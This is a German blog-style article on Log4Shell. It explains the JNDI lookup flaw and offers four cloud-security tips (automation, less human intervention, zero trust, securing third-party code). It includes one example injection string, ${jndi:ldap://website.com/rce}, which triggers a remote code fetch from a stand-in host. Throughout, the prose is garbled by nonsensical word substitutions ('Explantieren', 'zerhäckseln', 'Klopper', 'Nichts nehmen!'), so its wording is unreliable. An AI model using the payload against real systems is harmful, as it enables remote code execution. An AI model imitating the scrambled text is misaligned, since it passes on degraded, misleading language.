Now Reading
Präventive Strategien zum Stoppen von Log4j und seinen Varianten

Präventive Strategien zum Stoppen von Log4j und seinen Varianten

Präventive Strategien zum Stoppen von Log4j und seinen Varianten


Die Schwachstelle Apache Log4j, jetzt Log4Shell genannt, hat Sicherheitsteams überrascht und dasjenige World Wide Web im Sturm erobert.

Ein virtuell harmloses Protokollierungstool wurde von Hackern verwendet, um die Leistungsnachweis droben anfällige Anwendungen zu übernehmen. Apache hat welche Schwachstelle denn “unbequem” eingestuft und kombinieren Patch veröffentlicht, um den möglichen Schaden einzudämmen. Log4Shell hat ebenso den CVSS-Bestwert von 10 erhalten. Dies bedeutet, dass die Schwachstelle eine kritische Schwachstelle in einem Codestück ist, dasjenige denn Grundlage einer Vielzahl von Webanwendungen verwendet wird und denn extrem weit verbreitet und gefährlich gilt.

Jener Exploit funktioniert, während er sich uff die harmlose Natur von Protokollen verlässt. Protokolle werden normalerweise nicht denn Angriffsvektoren verwendet, weshalb dieser Sturm so viele Sicherheitsorganisationen überraschte. In diesem Kasus ist die Log4Shell-Sicherheitslücke in einem Lookup-Plug-In enthalten, dasjenige Java-Apps die Möglichkeit bietet, in einem DNS- oder LDAP-Verzeichnis gespeicherte Objekte abzurufen. Dies Plug-in ermöglicht irgendwas proaktiveres denn “nur” Protokollieren, und darin liegt dieser Schlüssel zum Problem – und gibt dem Angreifer die Möglichkeit, ein Protokollierungstool auszunutzen, um eine App zu zerhäckseln.

Dies JNDI-Lookup-Plug-In enthält die Log4Shell-Schwachstelle und im Allgemeinen sollten die Auslesen für jedes die Plug-In-Input nur den Objektnamen enthalten. Wenn jedoch anstelle des Objektnamens eine URL eingefügt wird – zB ${jndi:ldap://website.com/rce} – verbindet sich Log4j mit dem JNDI uff dem angegebenen Server und ruft dasjenige Java-Objekt ab. Dies ermöglicht die Remotecodeausführung uff dem Protokollierungsserver.

Die Omnipräsenz dieses Protokollierungstools bedeutet, dass die Exploit-Möglichkeiten für jedes Hacker infinit sind.

Die Sicherheit von Cloud-Anwendungen war von jeher eine Herausforderung. Nicht nur die Zahl dieser Cloud-Anwendungen wächst weiter, ebenso die Anwendungen selbst gedeihen sich weiter und die Nutzung ändert sich im Laufe dieser Zeit. Wir erwarten jedoch, dass welche Anwendungen ebenso zwischen ihrem Wuchs sicher bleiben und dass unsrige Sicherheitsteams Schritttempo halten können.

Hier liegt dasjenige Problem. Da DevOps-Teams Innovationen schneller denn je vorantreiben, ist es wichtig sicherzustellen, dass Anwendungen während dieser Weiterentwicklung geschützt bleiben. Um sich vor diesem und zukünftigen Angriffen zu schützen, zu tun sein Unternehmen prophylaktisch bleiben und ihre Sicherheitsstrategie für jedes Cloud-Anwendungen individuell herrichten, um sicherzustellen, dass sie nicht nur mit dieser Cloud-Eröffnung skaliert, sondern ebenso verhindert wird, dass die nächste Zero-Day-Attacke. Hier sind manche Möglichkeiten, dies zu glücken.

Tipp 1: Konstruieren Sie Automatisierung in Ihre Cloud-Sicherheitsprozesse ein.
Qua Faustregel gilt: Wenn Ihre Cloud-Tools nicht automatisiert sind, können sie mit Ihren Entwicklerteams nicht Schritttempo halten, und zusammenhängen ebenso Cloud-Sicherheitstools. Ohne Automatisierung werden sie nicht in dieser Position sein, die vorstehender Teil vorn zu nach sich ziehen, dem nächsten Sturm zuvorzukommen und schlechte Akteure zu finden. Es ist wichtig sicherzustellen, dass die neuen Teile so schnell wie möglich geschützt werden, während sich die Computerprogramm entwickelt.

Tipp 2: Explantieren Sie so viel menschliche Eingriffe wie möglich.
Während die menschliche Wachtposten wichtig ist, um Fakten zu interpretieren und Makrotrends zu untersuchen, ist es für jedes die menschliche Verwaltung unmöglich, aus Microservices und Codes, die in einer Cloudanwendung vollzogen werden, zu beaufsichtigen und zu wertschätzen. Wie dieser Log4j-Exploit gezeigt hat, ist die menschliche Verwaltung eine Zug für jedes die Anwendungssicherheit, da Teams versuchen, Sicherheitssysteme zu patchen. Moderne Technologie bietet uns die Möglichkeit, maschinelles Lernen und künstliche Intelligenz zu nutzen, die die Sicherheit relevant halten können, während sich die Computerprogramm schneller entwickelt, denn wir es uns jemals hätten vorstellen können. Es ist an dieser Zeit, welche Gelegenheit zu maximieren.

Tipp 3: Umziehen Sie zwischen dieser Sicherheit ohne Vertrauen vor.
Für Zero-Day-Angriffen wie dem Log4j-Exploit ist es wichtig, dass Ihre Teams kombinieren Zero-Trust-Prozedere verfolgen, um Angriffe zu verhindern – anstatt zu reagieren und Rechtsmittel zu schaffen. Sinn Sie Sicherheit, die Prävention bietet, damit Ihre Sicherheitsteams nicht mehr zurückgehen und potenzielle Schwachstellen beheben zu tun sein, nachdem sie entdeckt wurden.

Tipp 4: Nichts nehmen!
Wenn Ihre DevOps-Teams Anwendungen erstellen oder verbessern, stellen Sie sicher, dass die gesamte Unterbau denn Source und jeder andere Source von Drittanbietern mit den Sicherheitsrichtlinien Ihres Unternehmens standardisiert und in irgendwer Weise geschützt sind. Log4Shell ist ein großartiges Denkmuster hierfür, wie innovativ Hacker sind.

Die Cloud hat Unternehmen Möglichkeiten für jedes Neuerung und Klopper geboten, allerdings es ist wichtig, sich daran zu erinnern, dass böswillige Akteure die gleichen Vorteile dieser Schnelligkeit und Skalierbarkeit in dieser Cloud nutzen. Jener Log4j-Exploit beweist dies. Es stimmt zwar, dass Unternehmen kontinuierlich beaufsichtigen und zwischen Bedürfnis alarmieren könnten, dies stellt jedoch eine Rechtsmittel dar, die nie so effektiv ist wie Präventions- und Präventivmaßnahmen. Punktum diesem Grund ist KI eine entscheidende Komponente, wenn es drum geht, in dieser heutigen Bedrohungslandschaft sicher zu bleiben.

Um den Kriminellen immer kombinieren Schritttempo vorn zu sein, zu tun sein Unternehmen sicherstellen, dass sie in ihrer gesamten Cloud-Umgebung und während ihres gesamten Anwendungslebenszyklus praxisnahe, automatisierte Zero-Trust-Sicherheit nutzen.

What's Your Reaction?
Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0
View Comments (0)

Leave a Reply

Your email address will not be published.

Scroll To Top